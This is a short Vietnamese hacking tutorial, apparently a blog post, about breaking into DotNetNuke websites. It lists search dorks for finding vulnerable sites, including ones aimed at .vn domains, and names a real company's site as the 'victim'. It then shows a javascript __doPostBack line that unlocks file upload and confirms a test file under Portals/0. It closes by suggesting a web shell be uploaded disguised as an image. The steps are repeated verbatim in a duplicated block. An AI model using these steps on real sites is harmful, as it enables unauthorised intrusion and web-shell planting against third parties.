Hack forum với method DNN
tìm các forum lỗi với dork chính sau
inurl:/portals/0/default.aspx
inurl:/tabid/36/language/en-US/Default.aspx
Mình tùy biến đi để có dork cho site việt nam nhé
inurl:"/portals/0? site:..vn
chọn 1 thằng làm victim nhé,
mình chọn thằng này
http://www.viglaceraland.vn/
chạy trên browser
http://www.viglaceraland.vn/Provider...nkgallery.aspx
sẽ cho như sau
nó ko cho up file từ máy tính
ta chạy script sau javascript:__doPostBack('ctlURL$cmdUpload','')
thì nhận đc là
nó đã cho up load từ máy tính nhé.ta up thử 1 file txt nào
up file capuchino.txt nhé
chạy thử nha http://www.viglaceraland.vn/Portals/0/capuchino.txt
--->từ đây suy ra đường dẫn các file tương tự nhé
nó cho up file ảnh,thì ta có thể up shell thông qua up file ảnh nha,trên firefox mình ko chạy javascript đc nên ko demo chỗ này đc ^^ :v
chọn 1 thằng làm victim nhé,
mình chọn thằng này
http://www.viglaceraland.vn/
chạy trên browser
http://www.viglaceraland.vn/Provider...nkgallery.aspx
sẽ cho như sau
nó ko cho up file từ máy tính
ta chạy script sau javascript:__doPostBack('ctlURL$cmdUpload','')
thì nhận đc là
nó đã cho up load từ máy tính nhé.ta up thử 1 file txt nào
up file capuchino.txt nhé
chạy thử nha http://www.viglaceraland.vn/Portals/0/capuchino.txt
--->từ đây suy ra đường dẫn các file tương tự nhé
nó cho up file ảnh,thì ta có thể up shell thông qua up file ảnh nha,trên firefox mình ko chạy javascript đc nên ko demo chỗ này đc ^^ :v
Nhận xét
Đăng nhận xét